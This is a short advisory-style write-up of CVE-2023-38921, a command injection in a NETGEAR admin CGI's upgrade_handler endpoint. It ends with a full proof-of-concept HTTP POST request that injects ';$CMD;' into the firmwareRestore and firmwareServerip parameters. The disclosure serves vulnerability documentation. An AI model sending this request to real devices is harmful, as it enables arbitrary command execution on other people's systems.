CVE-2023-38921

An attacker with administrative privileges can exploit this vulnerability by sending a crafted POST request to the `/ngadmin.cgi?action=upgrade_handler` endpoint. The payload can be injected into the `firmwareRestore` or `firmwareServerip` parameters. By using metacharacters such as ';', the attacker can append arbitrary commands to be executed on the system [ref_id=2].

The vulnerability lies within the `upgrade_handler` function, which processes user inputs for `firmwareRestore` and `firmwareServerip`. These parameters are subsequently passed to a `tftp` function, which utilizes `system()` without proper validation, leading to command injection [ref_id=2].

The advisory does not specify the exact fix implemented. However, it indicates that NETGEAR is a CVE Program Partner and assigns CVE IDs to vulnerabilities in their products. Users are advised to refer to NETGEAR's security advisories for information on remediations and fixes for supported products [ref_id=1].

POST /ngadmin.cgi?action=upgrade_handler HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 114 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Xxxxxxxx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/ngadmin.cgi?action=up Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

firmware-upgrade-file=up&firmwareRestore=;$CMD;&firmwareServerip=;$CMD;